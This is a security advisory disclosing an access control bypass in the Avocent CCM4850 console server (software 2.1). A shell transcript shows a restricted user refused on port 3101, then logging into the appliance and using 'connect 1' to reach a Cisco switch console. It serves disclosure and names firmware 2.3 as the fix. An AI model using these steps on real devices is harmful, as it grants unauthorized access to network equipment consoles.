Hi, this is another bug I found during my research on console servers which is presumably fixed by now. So here you go: Summary: Port Access Control Bypass Vulnerability Details: Avocents CCM console server have a flaw which enables users to bypass access control by using ssh with standard password based authentication. On modern console servers you can set port permissions per user basis. Research showed however that in this case access control failed if you ssh directly into the console server with your user account and then use the "connect" command to access the illegitimate serial port. Which means that every user can access consoles of every device hooked up. ssh'ing directly to the tcp port representing the serial port didn't show this flaw. Vulnerable Versions: Tested on S/W Version 2.1, CCM4850 Patches/Workarounds: Vendor has released firmware 2.3 which according to the vendor fixes this problem also if the release notes don't mention this. See: ftp://ftp.avocent.com/public/product-upgrades/$ds1800/CCMx50%20Series/CCMx50%27s_AV_2.3/ "Exploit:" Design Flaw, exploit not needed. This is for demonstration: TCP-Port 3101 is -- if enabled serial port 1. User mylocal should have access only to ports 2 through 48. Direct access to 3101/tcp is correctly denied. However connecting to the Avocent first using mylocal account and then use connect command allows access to this port. In this experiment a cisco switch is hooked up to serial port 1. -------- snip ~/console/lab-notizen/avo|19% ssh Admin@ccm Admin@ccm's password: Avocent CCM4850 S/W Version 2.1 > show user User: Admin Level: Appliance Administrator Access: PALL,USER,SCON,SMON,PCON,BREAK Groups: Port Access: BY PORT Locked: N/A Last Login: 00 10:17:11 Port Username Duration Socket From Socket CLI Admin 00 00:00:04 22 0.0.0.0(58798) > show user mylocal User: mylocal Level: User Access: P2-48,BREAK Groups: Port Access: BY PORT Locked: NO Last Login: 00 08:10:24 > >Connection to ccm closed ~/console/lab-notizen/avo|20% ssh mylocal@ccm -p 3101 mylocal@ccm's password: Received disconnect from 192.168.100.209: 2: Access denied - No access to port 1 ~/console/lab-notizen/avo|21% ssh mylocal@ccm mylocal@ccm's password: Avocent CCM4850 S/W Version 2.1 > connect 1 Connected to Port: 1 9600,8,N,1,NONE cisco#Connection to ccm closed. ~/console/lab-notizen/avo|22% -------- snap (see also http://drwetter.org/cs-probs) Cheers, Dirk -- Dr. Dirk Wetter http://drwetter.org Consulting IT-Security + Open Source Key fingerprint = 80A2 742B 8195 969C 5FA6 6584 8B6E 59C1 E41B 9153
